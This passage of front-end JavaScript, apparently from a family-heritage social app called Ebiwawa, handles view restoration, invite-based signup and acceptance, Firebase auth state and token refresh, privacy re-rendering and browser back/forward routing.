                                    <h3 class="font-semibold text-gray-800 mb-2">Honor Your Ancestors</h3>
                                    <p class="text-sm text-gray-600">Add more details about your family members</p>
                                </div>
                            </div>

                            <!-- Buttons -->
                            <div class="flex flex-col gap-3 pt-4">
                                <button type="button" onclick="navigateToProfileFromModal('profile-view')" class="btn btn-primary w-full">Complete My Profile Now</button>
                                <button type="button" onclick="closeProfileCompletionModal()" class="text-gray-500 hover:text-gray-700 text-sm text-center">I'll do this later</button>
                            </div>
                        </div>
                    </div>
                `;
                appContainer.insertAdjacentHTML('beforeend', modalHTML);
                console.log('Profile completion modal HTML added to DOM');

                // Load user avatar in header immediately after dashboard renders
                loadUserAvatar();

                // Restore last view from localStorage, or default to feed-view.
                // history.state from replaceState/pushState survives page refreshes
                // and carries params (e.g. the Person object for person-detail-view),
                // so check it first and fall back to localStorage if absent.
                const lastView = localStorage.getItem('lastView') || 'feed-view';
                const histState = window.history.state;

                if (histState && histState.viewId === 'person-detail-view' && histState.params && histState.params.person) {
                    // Best case: history.state still carries the full person payload.
                    // But person-detail-view's render relies on appState.treeData
                    // (relationships list) and appState.currentTreeId (trust info
                    // fetch). Both are wiped on a fresh page load — B12 explicitly
                    // resets them on every auth-in. Load the tree data first, then
                    // render the person detail; otherwise the page mounts with
                    // 'Trust info unavailable' and zero relationships.
                    loadFamilyTreeData().finally(() => {
                        navigateToView('person-detail-view', histState.params, false);
                    });
                } else if (histState && histState.viewId === 'album-detail-view' && histState.params && histState.params.albumId) {
                    // Same refresh-restore pattern for album-detail-view: params
                    // carry {albumId, albumTitle}. Without this, the previous
                    // navigateToView(lastView, {}, false) branch below would drop
                    // the params and AlbumDetailPage(undefined, undefined) would
                    // render — page title "undefined" and fetchAndRenderPhotos
                    // firing GET /albums/undefined/photos, which surfaces as
                    // "Could not load photos: Failed to fetch" from the browser.
                    navigateToView('album-detail-view', histState.params, false);
                } else if (lastView === 'person-detail-view') {
                    // Stale person-detail without payload — falling back to FTV
                    // matches the user's mental model (they got here by clicking a
                    // card in the FTV), not the feed which is a different surface
                    // entirely.
                    console.log("Last view was person-detail-view without person data; falling back to family-tree-view.");
                    navigateToView('family-tree-view', {}, false);
                } else if (lastView === 'album-detail-view') {
                    // Stale album-detail without params — fall back to the
                    // parent photo-albums-view (the user's mental parent for
                    // this route) rather than the feed.
                    console.log("Last view was album-detail-view without album params; falling back to photo-albums-view.");
                    navigateToView('photo-albums-view', {}, false);
                } else {
                    navigateToView(lastView, {}, false);
                }

                // Show profile completion modal if this is first tree view after onboarding
                console.log('Setting timeout to show profile completion modal in 1 second...');
                setTimeout(() => {
                    console.log('Timeout triggered, calling showProfileCompletionModal()');
                    showProfileCompletionModal();
                }, 1000);
            } else if (appState.pendingTreeRequests?.length > 0 || appState.onboardingCompleted) {
                // No tree of their own, but either has pending join requests
                // OR has already completed onboarding. The second case covers
                // the post-block scenario: a join-requester whose MEMBER_OF
                // got torn down by block_user has hasTree=false and no
                // pending requests, but onboardingCompleted is still true.
                // WaitingForAcceptancePage handles both copy variants
                // (empty array → "no family connections yet"; non-empty →
                // "your X requests are pending"). Either way we do NOT
                // push them back into the onboarding wizard.
                appContainer.innerHTML = DashboardPage(appState.currentUser);
                document.getElementById('quick-upload-input')?.addEventListener('change', handleQuickUploadSubmit);
                loadUserAvatar();
                navigateToView('family-tree-view', {}, false);
            } else {
                // User is logged in but has no tree and no pending requests — show onboarding wizard.
                // B30a (round 2): right after a fresh signup, handleSignup has already written
                // OnboardingWizard() synchronously and called renderOnboardingStep(1). Then
                // onAuthStateChanged fires asynchronously, lands here, and was previously
                // re-writing innerHTML — which destroyed and rebuilt the entire onboarding
                // DOM (including the avatar picker markup) for a frame, producing the flash.
                // Skip the re-render if the wizard is already mounted.
                if (!document.getElementById('onboarding-wizard')) {
                    appContainer.innerHTML = OnboardingWizard();
                    startOnboarding();
                }
            }

            // Prompt 17: re-apply the cached hasUnread state to the newly-
            // rendered chat entry-point dots. renderApp rebuilds the sidebar
            // / mobile drawer / mobile bottom-nav chrome from scratch on
            // every call — the .ebw-chat-unread-dot elements come back
            // with the default `hidden` class, dropping any dot that was
            // showing before the render. This reapply keeps the indicator
            // honest between renders without waiting for the next Firestore
            // snapshot to re-fire. No-op when no dot elements exist (auth
            // pages, onboarding wizard, etc.).
            _reapplyChatUnreadIndicator();

            // Session 2c: sync native tab bar's active-state visual with
            // the current view. renderApp is called on every hash change +
            // auth state change so this covers first-boot, refresh-restore,
            // and direct navigateToPath jumps that bypass navigateToView.
            if (typeof _updateNativeTabActive === 'function') {
                _updateNativeTabActive();
            }
            // Session 2c.2: sync the native app-title slot with current view.
            if (typeof _updateNativeAppTitle === 'function') {
                _updateNativeAppTitle();
            }
        }

        // Check for invite token in URL (signed-in acceptance flow — pre-Q5)
        function getInviteTokenFromUrl() {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get('token');
        }

        // Q5 invite-gated signup: read ?invite=TOKEN (the new URL format used
        // by send_invite's response, served at /signup?invite=…).
        function getInviteCodeFromUrl() {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get('invite');
        }

        // Module-level: cached invite token + metadata once validated on the
        // signup form. Consumed (and cleared) by handleSignup after Firebase
        // signup succeeds.
        let pendingInvite = null;

        // Q5: fetch invite metadata from the PUBLIC backend endpoint (no auth
        // header needed), decorate the signup form with a "Invited by X to
        // join Y" pill, and pre-fill + lock the email field. Invalid/expired
        // tokens render an inline error state above the form.
        async function hydrateInviteContext(token) {
            try {
                const res = await fetch(`${API_BASE_URL}/invites/by-token/${encodeURIComponent(token)}`);
                const data = await res.json().catch(() => ({}));
                const banner = document.getElementById('signup-invite-banner');
                if (!banner) return;

                if (!res.ok || !data.valid) {
                    const reason = (data && data.reason) || 'unknown';
                    const msg = {
                        expired: 'This invitation has expired. Ask the person who invited you to send a new one.',
                        used:    'This invitation has already been used to sign up.',
                        revoked: 'This invitation has been withdrawn.',
                        unknown: 'This invitation link is not valid. Check the link or ask the person who invited you for a new one.',
                    }[reason] || 'This invitation could not be validated.';
                    banner.innerHTML = `
                        <div class="rounded-md border border-red-300 bg-red-50 p-3 text-sm text-red-900">
                            <p class="font-semibold mb-1">Invitation not valid</p>
                            <p class="text-xs">${escapeHtml(msg)}</p>
                        </div>`;
                    banner.classList.remove('hidden');
                    return;
                }

                pendingInvite = { token, ...data };

                const inviterName = data.inviterDisplayName || 'A family member';
                const treeName = data.treeName || 'their family tree';
                banner.innerHTML = `
                    <div class="rounded-md border border-green-300 bg-green-50 p-3 text-sm text-green-900">
                        <p class="font-semibold mb-1">You're invited</p>
                        <p class="text-xs">
                            <span class="font-semibold">${escapeHtml(inviterName)}</span>
                            has invited you to join
                            <span class="font-semibold">${escapeHtml(treeName)}</span>.
                            Sign up below using the email this invitation was sent to.
                        </p>
                    </div>`;
                banner.classList.remove('hidden');

                const emailField = document.getElementById('signup-email');
                if (emailField && data.recipientEmail) {
                    emailField.value = data.recipientEmail;
                    emailField.readOnly = true;
                    emailField.classList.add('bg-gray-100');
                }
            } catch (err) {
                console.warn('Invite lookup failed:', err);
            }
        }

        // Accept invite
        async function acceptInvite(token) {
            try {
                const response = await apiFetch(`${API_BASE_URL}/invites/accept`, {
                    method: 'POST',
                    body: { token }
                });

                return response;
            } catch (error) {
                console.error("Error accepting invite:", error);
                throw error;
            }
        }

        // Show invite acceptance UI
        function showInviteAcceptanceUI(inviteData) {
            const appContainer = document.getElementById('app');
            const inviter = escapeHtml(inviteData.inviterName || 'A family member');
            const tree = escapeHtml(inviteData.treeName || 'their family tree');
            const message = inviteData.message ? escapeHtml(inviteData.message) : '';
            appContainer.innerHTML = `
                <div class="ebw-invite-page">
                    <main class="ebw-invite-card">
                        <div class="ebw-invite-brand">
                            <img src="/ebiwawa-logo.svg" alt="Ebiwawa" class="ebw-invite-logo">
                        </div>
                        <h1 class="ebw-invite-headline">Welcome home.</h1>
                        <p class="ebw-invite-lead">
                            <span class="ebw-invite-strong">${inviter}</span>
                            invited you to join
                            <span class="ebw-invite-strong">${tree}</span>
                            on Ebiwawa — where African families and the diaspora hold their stories together.
                        </p>
                        ${message ? `
                            <blockquote class="ebw-invite-message">
                                <span class="ebw-invite-quote-mark" aria-hidden="true">&ldquo;</span>${message}
                            </blockquote>
                        ` : ''}
                        <div id="invite-error" class="ebw-invite-error" role="alert" hidden></div>
                        <div id="invite-success" class="ebw-invite-success" role="status" hidden></div>
                        <button id="accept-invite-btn" onclick="handleAcceptInvite()" class="btn btn-primary ebw-invite-cta">
                            Accept invitation
                        </button>
                        <p class="ebw-invite-note">
                            Already have an account signed in on this browser? This will add ${tree} to your existing account.
                        </p>
                    </main>
                    <footer class="ebw-invite-footer">
                        <div class="flex flex-wrap justify-center items-center gap-x-3 gap-y-1">
                            <a href="/about" class="landing-footer-link whitespace-nowrap py-2">About</a>
                            <span class="hidden sm:inline">·</span>
                            <a href="/help" class="landing-footer-link whitespace-nowrap py-2">Help</a>
                            <span class="hidden sm:inline">·</span>
                            <a href="/privacy" class="landing-footer-link whitespace-nowrap py-2">Privacy</a>
                            <span class="hidden sm:inline">·</span>
                            <a href="/terms" class="landing-footer-link whitespace-nowrap py-2">Terms</a>
                        </div>
                    </footer>
                </div>
            `;
        }

        // Handle invite acceptance
        window.handleAcceptInvite = async function() {
            const token = getInviteTokenFromUrl();
            if (!token) return;

            const errorDiv = document.getElementById('invite-error');
            const successDiv = document.getElementById('invite-success');
            const button = document.getElementById('accept-invite-btn');

            errorDiv.hidden = true;
            successDiv.hidden = true;
            button.disabled = true;
            button.textContent = 'Accepting…';

            // 2026-07-23: pre-check via /invites/by-token so we can distinguish
            // "not-valid-anymore" (used / revoked / expired) from "still
            // pending → attempt accept." Without the pre-check, a second
            // click on an already-accepted invite hit the POST → backend's
            // `MATCH (invite:Invitation {token, status: 'pending'})` missed
            // → 404 "Invalid invitation" surface, which reads as "your
            // invite link is broken" rather than "you already accepted."
            try {
                const preRes = await fetch(`${API_BASE_URL}/invites/by-token/${encodeURIComponent(token)}`);
                const preData = await preRes.json().catch(() => ({}));
                if (preData && preData.valid === false) {
                    const reason = preData.reason || 'unknown';
                    if (reason === 'used') {
                        // Already accepted — treat as success and route to app.
                        successDiv.textContent = 'You already accepted this invitation. Taking you to the app…';
                        successDiv.hidden = false;
                        const url = new URL(window.location);
                        url.searchParams.delete('token');
                        url.searchParams.delete('invite');
                        window.history.replaceState({}, '', url);
                        setTimeout(async () => {
                            try { await fetchCurrentUser(true); } catch (_) {}
                            renderApp();
                        }, 1500);
                        return;
                    }
                    const msg = ({
                        expired: 'This invitation has expired. Ask the person who invited you to send a new one.',
                        revoked: 'This invitation has been withdrawn.',
                        unknown: 'This invitation link is not valid. Check the link or ask the person who invited you for a new one.',
                    })[reason] || 'This invitation could not be validated.';
                    errorDiv.textContent = msg;
                    errorDiv.hidden = false;
                    button.disabled = false;
                    button.textContent = 'Accept invitation';
                    return;
                }
            } catch (_) {
                // Network flake on the pre-check is non-fatal; fall through
                // to the POST attempt which will surface the real state.
            }

            try {
                const response = await acceptInvite(token);

                successDiv.textContent = response.message || 'Invitation accepted. Redirecting…';
                successDiv.hidden = false;

                // Remove token + invite from URL
                const url = new URL(window.location);
                url.searchParams.delete('token');
                url.searchParams.delete('invite');
                window.history.replaceState({}, '', url);

                // Refresh user data and redirect to app.
                // Bust cache so /me picks up the new tree membership immediately —
                // the existing-user accept branch adds MANAGES:member which
                // /me's hasTree derivation reflects.
                setTimeout(async () => {
                    try { await fetchCurrentUser(true); } catch (_) {}
                    renderApp();
                }, 2000);

            } catch (error) {
                errorDiv.textContent = error.message || 'Failed to accept invitation';
                errorDiv.hidden = false;
                button.disabled = false;
                button.textContent = 'Accept invitation';
            }
        };

        // B13: keep appState.authToken in sync with Firebase's token rotation.
        // Firebase rotates the ID token roughly every hour; without this listener
        // the cached token goes stale and the backend starts returning 401
        // ("Invalid or expired token") after the first rotation. onIdTokenChanged
        // fires on every refresh (including the initial sign-in), so we update
        // the cache wherever it changes.
        onIdTokenChanged(auth, async (user) => {
            if (user) {
                try {
                    appState.authToken = await user.getIdToken();
                } catch (e) {
                    console.warn("onIdTokenChanged: getIdToken failed", e);
                }
            } else {
                appState.authToken = null;
            }
        });

        // Session 2b Task 3a: consume any pending signInWithRedirect result
        // BEFORE wiring the auth state listener. On native + on any web page
        // that came back from a redirect flow, getRedirectResult() reads the
        // credential; failing to call it means the sign-in silently doesn't
        // land (auth.currentUser stays null after the round-trip). Errors
        // are logged inside consumeRedirectResult, non-fatal here.
        consumeRedirectResult();

        // Firebase Authentication State Listener
        onAuthStateChanged(auth, async (user) => {
            if (user) {
                // User is signed in
                try {
                    // B12: reset session-scoped tree state on every auth-in event.
                    // Without this, if the previous session left appState.currentTreeId
                    // / treeData / personsInTree populated, those cached values can
                    // bleed into the new session. Symptom: after re-login + add-person,
                    // the new person doesn't appear in the Family Members list until
                    // manual refresh, because the cached personsInTree was used to
                    // render before fetchCurrentUser refreshed it.
                    appState.currentTreeId = null;
                    appState.currentTree = null;
                    appState.treeData = null;
                    appState.personsInTree = [];

                    // Get Firebase ID token
                    const token = await user.getIdToken();
                    appState.authToken = token;
                    appState.currentUser = user;
                    appState.isAuthenticated = true;

                    // Check for invite token in URL. Q5: short-circuit when an
                    // in-flight invite consumption is happening (handleSignup
                    // just minted this user via /signup?invite= and is about
                    // to call /invites/accept) OR when consumption already
                    // succeeded. Without this, the old "You're Invited!"
                    // overlay flashes in the race window between the Firebase
                    // signup and the accept call, AND again on any later
                    // page reload that leaves a ?token= behind.
                    const inviteToken = getInviteTokenFromUrl();
                    if (inviteToken && !pendingInvite && !onboardingState.joinedExistingTree) {
                        // Show invite acceptance UI
                        showInviteAcceptanceUI({
                            inviterName: "A family member",
                            treeName: "their family tree"
                        });
                        return; // Don't continue with normal app flow
                    }

                    // Check if we need to bust the cache (e.g., after onboarding)
                    const bustCache = localStorage.getItem('bustUserCache') === 'true';
                    if (bustCache) {
                        localStorage.removeItem('bustUserCache');
                    }

                    // Fetch user info from backend (need this to know if user has tree)
                    await fetchCurrentUser(bustCache);

                    // Now render the app with correct user state
                    renderApp();

                    // Load pending connection requests count for badge (runs in parallel)
                    loadPendingRequestsCount();

                    // Prompt 17: attach the persistent chat unread listener
                    // now that currentUserNeo4jId is populated. Must run
                    // AFTER renderApp so the .ebw-chat-unread-dot elements
                    // exist in the DOM to be toggled. Startup helper is
                    // idempotent — repeat auth-in events (token rotation,
                    // etc.) reuse the same listener without leaks.
                    startUnreadIndicatorListener();

                } catch (error) {
                    console.error("Error during auth state change:", error);
                    appState.isAuthenticated = false;
                    renderApp();
                }
            } else {
                // User is signed out
                // Prompt 17: same teardown as logout() — mirroring here
                // catches any signed-out event that bypassed the manual
                // logout button (token revocation, onUnauthorized, etc.).
                stopUnreadIndicatorListener();

                appState.currentUser = null;
                appState.currentUserNeo4jId = null;
                appState.authToken = null;
                appState.isAuthenticated = false;
                appState.hasTree = false;

                // Item 16 Phase A: same cleanup as the manual logout() —
                // signOut() async resolution races with logout()'s post-await
                // cleanup, so we mirror it here to guarantee the view-memory
                // and URL are reset before renderApp paints. This catches
                // any signed-out event regardless of which client surface
                // triggered it (the visible Logout button, an unauthorized
                // API response → onUnauthorized → logout, or a Firebase-side
                // token revocation).
                try { localStorage.removeItem('lastView'); } catch (e) { /* noop */ }
                // Preserve legitimate signed-out routes (/login, /signup,
                // /auth/action); only clear app-internal paths or stale view
                // hashes. Without the preservation, a fresh incognito visit
                // to /signup was being rewritten to / before renderApp ran,
                // so the /signup branch never matched and the Q5 invite gate
                // never rendered — bug surfaced 2026-06-14.
                const _signedOutPath = window.location.pathname;
                const _signedOutPreserve =
                    _signedOutPath === '/login' ||
                    _signedOutPath === '/signup' ||
                    _signedOutPath === '/auth/action';
                if (!_signedOutPreserve) {
                    window.history.replaceState({}, '', '/');
                }
                if (window.location.hash) {
                    // Clear stale view hash even on preserved routes.
                    window.history.replaceState({}, '', window.location.pathname + window.location.search);
                }

                renderApp();
            }
        });

        // Initial render (auth listener will handle actual rendering)
        document.addEventListener('DOMContentLoaded', () => {
            // Show loading state with branded spinner
            const appContainer = document.getElementById('app');
            appContainer.innerHTML = `
                <div class="min-h-screen flex items-center justify-center bg-gradient-to-br from-amber-50 to-orange-50">
                    <div class="text-center">
                        <h1 class="text-4xl font-bold" style="color: var(--ebiwawa-gold, #FCAB10); font-family: 'Outfit', sans-serif;">EBIWAWA</h1>
                        <p class="mt-1 text-sm text-gray-500">African Family Digital Heritage</p>
                        <div class="mt-6 flex justify-center">
                            <div class="w-8 h-8 border-3 border-amber-200 border-t-amber-500 rounded-full animate-spin"></div>
                        </div>
                    </div>
                </div>
            `;
            // Session 2b Phase 1: wire native shell — see call below the DCL block.
        });

        // Session 2b Phase 1: initialize the native shell REGARDLESS of DOMContentLoaded
        // firing state. Deferred module scripts SHOULD run before DCL fires per spec, but
        // Capacitor's Android WebView had a case (2026-09-15) where the DCL-inside handler
        // never fired even though the app rendered normally. Directly calling initNativeShell
        // at module-execution time is safe because:
        //   - Every native-shell hook uses document.addEventListener OR App.addListener,
        //     both of which are safe to call at any point after document creation
        //   - No native-shell hook actually queries the DOM at init time (they attach
        //     listeners that later resolve DOM references)
        // If DOM isn't parsed yet, addEventListener still works — event just fires later.
        try {
            initNativeShell();
        } catch (e) {
            console.error('[app] initNativeShell threw:', e);
        }

        // Phase 3 Session 2: propagate privacy toggles to live renders.
        // Handler is intentionally light — it patches the in-memory Person(s)
        // and calls the relevant re-render. No network round-trip; the source
        // of truth for the mode is the PATCH we already made.
        window.addEventListener('ebw:privacy-changed', (evt) => {
            const { personId, mode } = (evt && evt.detail) || {};
            if (personId == null || !mode) return;
            // Members list cache.
            const listPersons = appState._lastListPersons;
            if (Array.isArray(listPersons)) {
                const p = listPersons.find(x => x && x.id === personId);
                if (p) p.privacy_mode = mode;
            }
            // FTV cache.
            const treeData = appState.treeData;
            if (treeData && Array.isArray(treeData.persons)) {
                const p = treeData.persons.find(x => x && x.id === personId);
                if (p) p.privacy_mode = mode;
            }
            // Re-render whatever's live now. renderPeopleList reads its own
            // cache; renderFamilyTree reads treeData.
            try {
                if (typeof rerenderPeopleList === 'function'
                    && document.getElementById('people-cards')) {
                    rerenderPeopleList();
                }
            } catch (e) { /* noop */ }
            try {
                if (treeData && typeof renderFamilyTree === 'function'
                    && document.getElementById('family-tree-view')) {
                    renderFamilyTree(treeData.persons, treeData.relationships || []);
                }
            } catch (e) { /* noop */ }
            // Person Detail view: if the currently-open Person is the one whose
            // privacy changed, re-render with the fresh Person from treeData.
            try {
                const detailEl = document.getElementById('person-detail-view');
                if (detailEl && treeData && Array.isArray(treeData.persons)) {
                    const fresh = treeData.persons.find(x => x && x.id === personId);
                    const openId = (window.history.state && window.history.state.params
                        && window.history.state.params.person
                        && window.history.state.params.person.id);
                    if (fresh && openId === personId) {
                        const mainContent = document.getElementById('main-content');
                        if (mainContent) {
                            mainContent.innerHTML = PersonDetailPage(fresh);
                            renderPersonRelationships(fresh.id);
                        }
                    }
                }
            } catch (e) { /* noop */ }
        });

        // Session 2c.1 #4: header hides on scroll-down, shows on scroll-up.
        // Matches Facebook/Instagram convention. Only fires past a small
        // threshold so tap-jitter doesn't toggle the header. Passive listener
        // for scroll perf. No-op when no header exists (auth pages, etc.).
        (function _wireHeaderScrollHide() {
            let lastY = window.scrollY || 0;
            let ticking = false;
            const THRESHOLD = 8; // px of scroll delta before we react
            const HIDE_AFTER = 64; // px from top before we hide at all
            function update() {
                const y = window.scrollY || 0;
                const header = document.getElementById('app-header');
                if (!header) { lastY = y; ticking = false; return; }
                const dy = y - lastY;
                if (Math.abs(dy) < THRESHOLD) { ticking = false; return; }
                if (y < HIDE_AFTER) {
                    header.classList.remove('ebw-header-hidden');
                } else if (dy > 0) {
                    header.classList.add('ebw-header-hidden');
                } else {
                    header.classList.remove('ebw-header-hidden');
                }
                lastY = y;
                ticking = false;
            }
            window.addEventListener('scroll', () => {
                if (!ticking) { window.requestAnimationFrame(update); ticking = true; }
            }, { passive: true });
        })();

        // Handle browser back/forward buttons.
        // Item 16 Phase A: path-routed surfaces (/, /login, /auth/action) all
        // need renderApp to re-dispatch when the user back/forwards between
        // them. Hash-routed views still go through navigateToView.
        window.addEventListener('popstate', (event) => {
            // Session 2c.1 #1: overlay history-state pattern. Every registered
            // overlay handler is idempotent — closes only if that overlay is
            // currently visible. If any handler DID close something, skip the
            // SPA view-nav dispatch because the underlying view wasn't
            // visually replaced (overlay just covered it).
            let anyClosed = false;
            for (const [id, handler] of Object.entries(window._ebwOverlayCloseHandlers || {})) {
                try {
                    if (handler()) anyClosed = true;
                } catch (_) { /* noop */ }
            }
            if (anyClosed) return;

            // B43: hash-view state wins over path-based dispatch. The previous
            // ordering checked pathname first and called renderApp() whenever
            // pathname was '/' — but pathname stays '/' for EVERY hash-routed
            // dashboard view (#feed-view, #family-tree-view, etc., all at
            // '/#viewId'). So Back from any in-app view at '/' was getting
            // stomped onto the dashboard default instead of walking back
            // through the hash-view history.
            const _path = window.location.pathname;
            const _viewId = event.state && event.state.viewId;

            if (_viewId && appState.isAuthenticated) {
                navigateToView(_viewId, event.state.params || {}, false);
                return;
            }
            if (_path === '/' || _path === '/login' || _path === '/signup' || _path === '/auth/action') {
                renderApp();
                return;
            }
            navigateToView('feed-view', {}, false);
        });

// ---- Globals for inline HTML handlers (onclick=, onchange=, etc.) ----
// Auto-generated during Phase 1.1 module conversion. Each entry here is
// referenced by an inline handler in a template string. Once those handlers
// migrate to addEventListener, the corresponding name can be removed.
Object.assign(window, {
    appState,
    acceptConnectionRequest,
    aiDescribePhoto,
    aiDescribeCurrentPhoto,
    navigateToFamilyTreeFromNav,
    closeDeleteAccountModal,
    downloadMyData,
    openDeleteAccountModal,
    submitDeleteAccount,
    updateDeleteConfirmState,
    analyzeDocument,
    archiveConversation,
    blockUser,
    cancelInvite,
    // Phone signup handlers — inline onclick handlers in PhoneSignupModal
    // template call these globally. Must be exposed on window because
    // app.js is an ES module.
    openPhoneSignupModal,
    handlePhoneSendCode,
    handlePhoneVerifyCode,
    handlePhoneBackToNumber,
    changeMonth,
    changeRole,
    clearAllMedia,
    clearFileSelection,
    closeAvatarPicker,
    closeModal,
    closePhotoLightbox,
    closeProfileCompletionModal,
    closeSendConnectionRequestModal,
    confirmBlockUser,
    confirmDeleteComment,
    confirmDeletePost,
    declineConnectionRequest,
    deleteAlbum,
    deleteConversation,
    deleteCurrentPhoto,
    deleteDocument,
    deletePerson,
    deletePersonFromEdit,
    deletePhotoFromGrid,
    // Phase 1 list redesign — toolbar + card click handlers.
    rerenderPeopleList,
    openPersonDetailById,
    openPersonEditById,
    // Phase 2 FTV chrome handlers.
    toggleFtvTreePicker,
    switchActiveTree,
    setFtvPerspective,
    setFtvFocusMode,
    openRenameTreeModal,
    handleRenameTree,
    suggestStrongPassword,
    toggleSignupPasswordVisibility,
    deleteRelationship,
    downloadDocument,
    filterDocuments,
    filterTimelineByPerson,
    generateAIStory,
    goToToday,
    handleAddComment,
    handleAddPerson,
    // Session 2c native tab bar handlers.
    ebwNavigateTab,
    ebwNativeTabAdd,
    // Session 2c.1 #5: Add-tab action-sheet handlers.
    ebwAddSheetTakePhoto,
    ebwAddSheetChooseFromLibrary,
    ebwAddSheetWritePost,
    // Session 2f: native Feed↔Photos segmented control (Posts | Photos).
    ebwFeedSegment,
    handlePersonPhotoPreview,
    clearPersonPhotoInput,
    togglePersonAvatarPicker,
    pickPersonDiceBearAvatar,
    openAddPersonModal,
    handleAvatarPreview,
    handleAvatarUpload,
    handleCountryChange,
    handleEditPost,
    handleFamilySearch,
    handleMixedMediaPreview,
    handlePhotoUploadSubmit,
    handleQuickUploadClick,
    handleSearch,
    handleSendInvite,
    handleStateChange,
    hideReplyForm,
    insertEmojiAtCursor,
    jumpToCarouselSlide,
    logout,
    navigateCarousel,
    navigatePhoto,
    navigateToProfileFromModal,
    navigateToPath,
    navigateToView,
    nextOnboardingStep,
    openAddRelationshipModal,
    openAddRelationshipModalForPerson,
    openEditPersonModal,
    openEditProfileModal,
    openModal,
    openNewMessageModal,
    openPhotoLightbox,
    openSendConnectionRequestModal,
    openShareModal,
    previousOnboardingStep,
    reactToComment,
    reactToMessage,
    removeMember,
    removeMixedMedia,
    removePhoto,
    removePhotoTag,
    selectTreeToJoin,
    selectTreeToJoinFromButton,
    switchToOwnTreeFromJoin,
    resendInvite,
    resetTreeZoom,
    saveSharing,
    searchFamilyTrees,
    selectConversation,
    backToConversationList,
    openRecipientPicker,
    closeRecipientPicker,
    selectRecipient,
    selectDiceBearAvatar,
    sendConnectionRequest,
    setDocumentsView,
    showAvatarPicker,
    showCommentReactionPicker,
    showEmojiPickerForInput,
    showReactionPicker,
    showReplyForm,
    signInWithFacebook,
    signInWithGoogle,
    skipAvatar,
    skipCurrentStep,
    searchFromOrphanPage,
    sendOrphanConnectionRequest,
    skipToPendingOnboarding,
    startOwnTreeFromWaiting,
    skipTreeSearch,
    suggestAICaption,
    switchAuthTab,
    switchCalendarView,
    switchConnectionTab,
    switchRequestsSubTab,
    switchFamilyTreeTab,
    tagPersonInPhoto,
    toggleCalendarVisibility,
    toggleChatType,
    toggleCommentLike,
    toggleComments,
    toggleDeathFields,
    toggleEditDeathFields,
    toggleLike,
    toggleMarriageYearField,
    toggleMemberActions,
    toggleMobileMenu,
    openHelpDrawer,
    closeHelpDrawer,
    toggleMobileSearch,
    togglePhotoTagging,
    togglePinPost,
    togglePostMenu,
    transcribeAudio,
    unblockUser,
    updateBirthDays,
    updateUserRole,
    updatePrivacyChoice,
    handleManagePrivacyToggle,
    handleDeceasedPrivacyToggle,
    openPrivacyChangeRequest,
    useDefaultTreeName,
    pickTreeNameAlternative,
    lookupRelativeOnPlatform,
    sendRelativeConnectionRequest,
    dismissRelativeSuggestion,
    handleForgotPassword,
    openPersonFromTimeline,
    verifyPerson,
    removeVerification,
    viewMediaItem,
    zoomTreeIn,
    zoomTreeOut,
});

